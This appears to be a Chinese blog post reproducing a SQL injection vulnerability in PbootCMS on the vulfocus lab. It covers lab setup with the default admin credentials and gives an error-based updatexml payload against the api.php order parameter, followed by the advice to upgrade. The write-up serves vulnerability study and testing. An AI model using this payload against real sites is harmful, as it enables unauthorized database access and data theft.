简介

PbootCMS是一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。 PbootCMS中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 后台路径:/admin.php 用户名密码:admin:123456 授权码自行获取:https://www.pbootcms.com/freesn/

靶场搭建

使用在线靶场http://vulfocus.fofa.so
在这里插入图片描述
进入环境,发现需要获取授权码
在这里插入图片描述
https://www.pbootcms.com/freesn/
进入网站,输入域名获取授权码
在这里插入图片描述
然后进入网站后台
后台路径:/admin.php 用户名密码:admin:123456
在这里插入图片描述
在这里插入图片描述
输入域名授权码并提交

在这里插入图片描述
将API启用
在这里插入图片描述
再次访问网站,已经可以正常访问了
在这里插入图片描述

漏洞复现

构造payload

/api.php/List/index?order=123%20and(updatexml(1,concat(0x7e,(select%20md5(1954))),1))%20%23

在这里插入图片描述
payload中的md5(1954)被执行,证明漏洞存在。

修复

升级为最新版本

Logo

快速构建 Web 应用程序

更多推荐